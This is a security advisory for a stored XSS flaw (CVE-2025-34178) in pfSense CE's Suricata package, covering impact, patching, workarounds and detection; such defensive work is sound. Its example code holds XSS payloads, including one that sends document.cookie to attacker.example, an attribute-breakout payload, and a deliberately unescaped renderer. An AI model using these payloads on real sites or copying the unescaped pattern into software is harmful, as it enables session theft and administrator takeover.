CVE-2025-34178

5.4 MEDIUM

📋 TL;DR

This stored XSS vulnerability in the Suricata package for pfSense CE lets an authenticated user who holds the 'WebCfg - Services: suricata package' privilege save a policy name containing script into the package configuration. The value is later echoed unescaped, so when any other administrator opens the affected page the script runs in that administrator's browser context, with the victim's session and privileges. Only accounts with that privilege can plant the payload; any administrator who views the page is a potential victim.

💻 Affected Systems

Products:
  • pfSense CE
Versions: Suricata package builds shipped before the fix in commit 97852ccfd201b24ee542be30af81272485fde0b4
Operating Systems: FreeBSD-based pfSense installations
Default Config Vulnerable: ⚠️ Only once the Suricata package is installed; it is an optional add-on, not part of the base install
Notes: Only affects installations with the Suricata package installed and configured. Exploitation requires an attacker account holding the 'WebCfg - Services: suricata package' privilege.

📦 What is this software?

pfSense CE is the Community Edition of the FreeBSD-based pfSense firewall/router distribution, administered through a PHP web interface (the webConfigurator). The Suricata package is an optional add-on installed through the Package Manager; it runs the Suricata IDS/IPS engine on selected interfaces and exposes its configuration, including the application-layer parser settings where this flaw lives, under the /suricata/ pages of the GUI.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Because the injected script runs in the webConfigurator's own origin, it can read the victim administrator's session cookies, read the anti-CSRF token embedded in GUI forms and submit requests that change firewall rules or add users with the victim's privileges, or redirect the victim to a malicious site. Full administrative takeover of the firewall is the realistic ceiling.

🟠

Likely Case

Session hijacking of administrators viewing the Suricata configuration page, allowing the attacker to perform actions with the victim's privileges.

🟢

If Mitigated

Limited to authenticated users with specific permissions; impact contained to administrative interface with proper network segmentation.

🌐 Internet-Facing: MEDIUM - If pfSense web interface is exposed to the internet, authenticated attackers could exploit this, but requires specific permissions.
🏢 Internal Only: MEDIUM - Internal attackers with appropriate permissions could exploit this to escalate privileges or compromise other administrators.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires authenticated access with the Suricata package privilege. Exploitation consists of saving an XSS payload in the policy_name parameter; the value is stored in the package configuration and executes in the browser of any administrator who later views the page.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version containing commit 97852ccfd201b24ee542be30af81272485fde0b4

Vendor Advisory: https://redmine.pfsense.org/issues/16414

Restart Required: No

Instructions:

1. Update the Suricata package via System > Package Manager > Installed Packages (package updates are released independently of the base pfSense CE version).
2. Confirm the installed package contains the fix from commit 97852ccfd201b24ee542be30af81272485fde0b4.
3. No service restart is required; the fix is in the PHP page, which is served fresh on the next request.

🔧 Temporary Workarounds

Remove vulnerable permissions

Applies to: all versions

Temporarily remove the 'WebCfg - Services: suricata package' privilege from every account that does not need it; it is the only privilege that permits the injection.

Disable Suricata package

Applies to: all versions

If the IDS/IPS is not needed, uninstall or disable the Suricata package; the vulnerable page ships with the package, not with the base system.

🧯 If You Can't Patch

  • Restrict the 'WebCfg - Services: suricata package' privilege to the smallest possible set of administrators, and restrict network access to the webConfigurator to a management network
  • Audit the stored Suricata policy names for markup (the payload persists in the configuration, so a clean audit now does not protect against a later save)
  • A Content Security Policy header would blunt inline script, but pfSense exposes no CSP setting in the GUI; adding one means editing the generated nginx configuration for the webConfigurator, which the system can overwrite, so treat it as defense in depth at best

🔍 How to Verify

Check if Vulnerable:

Confirm the Suricata package is installed (System > Package Manager > Installed Packages, or 'pkg info pfSense-pkg-suricata' on the CLI) and that the installed version predates the fix commit 97852ccfd201b24ee542be30af81272485fde0b4. The vulnerable code is in /suricata/suricata_app_parsers.php.

Check Version:

The base system version (dashboard, or 'cat /etc/version' on the CLI) is not sufficient on its own, because the flaw is in the package. Check the installed Suricata package version in Package Manager or with 'pkg info pfSense-pkg-suricata'.

Verify Fix Applied:

Verify that the package's /suricata/suricata_app_parsers.php passes the stored policy_name through htmlspecialchars() (or equivalent output encoding that also encodes quotes) everywhere the value is echoed back, in element text as well as inside attribute values; encoding only angle brackets leaves attribute-context payloads live.
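The check above is easier to reason about with the pattern in front of you. The following is an added example, not code from the pfSense Suricata package: a Python model of the vulnerable rendering beside the hardened one, with an oracle that tells the two apart. Only the parameter name policy_name comes from the advisory; the row layout (a table cell plus a form input that re-displays the stored name) and the payloads are constructed for illustration. It also covers the attribute-context case, where a payload with no angle brackets at all still executes unless quotes are encoded.

```python
"""Model of the stored-XSS pattern behind CVE-2025-34178 (added example).

The real page is PHP (/suricata/suricata_app_parsers.php); this is NOT that code.
It models the pattern: a stored policy_name is interpolated into HTML once in
text context and once inside a double-quoted attribute, with and without escaping.
"""
import html
import re

# Constructed attacker inputs: what an account holding the
# 'WebCfg - Services: suricata package' privilege could save as a policy name.
PAYLOADS = {
    "element":   "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    "attribute": '" onmouseover="alert(document.domain)',   # no angle brackets at all
    "benign":    "default-http-policy",
}


def render_unsafe(policy_name: str) -> str:
    """Vulnerable pattern: the stored value is concatenated straight into markup."""
    return (f"<td>{policy_name}</td>"
            f'<input type="text" name="policy_name" value="{policy_name}">')


def render_safe(policy_name: str) -> str:
    """Hardened pattern: HTML-encode on output, quotes included.

    Python equivalent of PHP htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE).
    Encoding '<' and '>' alone would leave the "attribute" payload above live.
    """
    safe = html.escape(policy_name, quote=True)
    return (f"<td>{safe}</td>"
            f'<input type="text" name="policy_name" value="{safe}">')


TEMPLATE_TAG_COUNT = 3  # <td>, </td>, <input> are the only tags the template itself emits


def markup_injected(rendered: str) -> bool:
    """Oracle: did user data become markup?

    True if extra tags appeared (element injection) or an event-handler
    attribute follows a prematurely closed value="..." (attribute injection).
    """
    tags = len(re.findall(r"<[A-Za-z/]", rendered))
    handler = re.search(r'value="[^"]*"\s+on\w+\s*=', rendered) is not None
    return tags != TEMPLATE_TAG_COUNT or handler


def audit(payloads: dict = PAYLOADS) -> dict:
    """For each payload: (injected through the unsafe renderer, injected through the safe one)."""
    return {label: (markup_injected(render_unsafe(p)), markup_injected(render_safe(p)))
            for label, p in payloads.items()}


if __name__ == "__main__":
    for label, (unsafe_hit, safe_hit) in audit().items():
        print(f"{label:10s} unsafe={'XSS' if unsafe_hit else 'ok '}  safe={'XSS' if safe_hit else 'ok'}")
```

The two rows that matter are "element" and "attribute": both are injected by render_unsafe and neither by render_safe. If a patched page encodes angle brackets but not quotes, the attribute row stays red, which is exactly what the verification step above is asking you to rule out.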

📡 Detection & Monitoring

Log Indicators:

  • Unusual modifications to Suricata policy names containing script tags or JavaScript
  • Multiple failed authentication attempts followed by successful login to Suricata interface

Network Indicators:

  • Unexpected outbound connections from pfSense admin interface to external domains

SIEM Query:

source="pfSense" AND (event_type="web_access" AND uri="/suricata/suricata_app_parsers.php" AND (params CONTAINS "<script>" OR params CONTAINS "javascript:"))

Caveat: the policy name is submitted in a POST body, so a web access log that records only the request line will not contain the payload. The query above only works against a log source that captures form parameters (for example a reverse proxy or WAF in front of the GUI). Without that, the access log tells you who saved the page and when; the authoritative check is the stored configuration itself.
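Two detection checks that follow from the indicators above, as an added example that is not code from pfSense or the Suricata package. The first audits the stored policy names in a config.xml backup for anything that could become markup or script; the only element name taken from the advisory is policy_name, the nesting under installedpackages/suricata is an assumption, so the search is deliberately path-agnostic. The second pulls requests for /suricata/suricata_app_parsers.php out of nginx-style access-log lines; this assumes access logging is enabled for the webConfigurator and uses the combined format. Both inputs are constructed samples.

```python
"""Detection checks for CVE-2025-34178 (added example, not project code)."""
import re
import xml.etree.ElementTree as ET

# Constructed config.xml fragment.  The element name policy_name is from the
# advisory; its position under installedpackages/suricata is an assumption.
SAMPLE_CONFIG = """<pfsense>
  <installedpackages>
    <suricata>
      <rule>
        <interface>wan</interface>
        <libhtp_policy>
          <item><policy_name>default</policy_name><bind_to>all</bind_to></item>
          <item><policy_name>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</policy_name></item>
          <item><policy_name>x onerror=alert(1)</policy_name></item>
        </libhtp_policy>
      </rule>
    </suricata>
  </installedpackages>
</pfsense>
"""

# Constructed nginx combined-format lines.  pfSense GUI sessions are cookie
# based, so the remote_user field is "-"; the POST is the save, the GET the view.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Aug/2025:10:15:32 +0000] "GET /suricata/suricata_app_parsers.php?id=0 HTTP/1.1" 200 18322 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Aug/2025:10:16:01 +0000] "POST /suricata/suricata_app_parsers.php?id=0 HTTP/1.1" 302 0 "https://fw.example/suricata/suricata_app_parsers.php?id=0" "Mozilla/5.0"
192.0.2.25 - - [01/Aug/2025:10:17:44 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Anything that can become markup or script once echoed unescaped: tags,
# quotes (attribute breakout), javascript: URLs, event handlers, entity encodings.
SUSPICIOUS = re.compile(r"[<>\"']|javascript:|\bon\w+\s*=|&#x?[0-9a-f]+;", re.I)


def find_suspicious_policy_names(config_xml: str) -> list:
    """Return every <policy_name> value (anywhere in the file) that matches SUSPICIOUS.

    ElementTree decodes &lt;/&gt; back to the literal characters the GUI would echo.
    """
    root = ET.fromstring(config_xml)
    return [el.text for el in root.iter("policy_name")
            if el.text and SUSPICIOUS.search(el.text)]


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def suricata_page_requests(log_lines, path="/suricata/suricata_app_parsers.php") -> list:
    """Every request whose path (query string stripped) is the vulnerable page."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("uri").split("?", 1)[0] == path:
            hits.append({k: m.group(k) for k in ("ip", "ts", "method", "uri", "status")})
    return hits


def writes_to_policy_page(log_lines) -> list:
    """POSTs are saves (where a payload is planted); GETs are views (where a victim is hit)."""
    return [h for h in suricata_page_requests(log_lines) if h["method"] == "POST"]


if __name__ == "__main__":
    for name in find_suspicious_policy_names(SAMPLE_CONFIG):
        print("suspicious policy_name:", repr(name))
    for hit in writes_to_policy_page(SAMPLE_LOG.splitlines()):
        print(f"save by {hit['ip']} at {hit['ts']} -> {hit['uri']} ({hit['status']})")
```

Run the first check against /conf/config.xml (or a downloaded backup) on the firewall; run the second against whatever access log your webConfigurator actually writes. Correlating a flagged policy name with the POST that saved it gives you the responsible account's source address and time, which is as close as the access log gets to attribution since the body itself is never logged.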

🔗 References

  • pfSense Redmine issue: https://redmine.pfsense.org/issues/16414
  • Fix commit: 97852ccfd201b24ee542be30af81272485fde0b4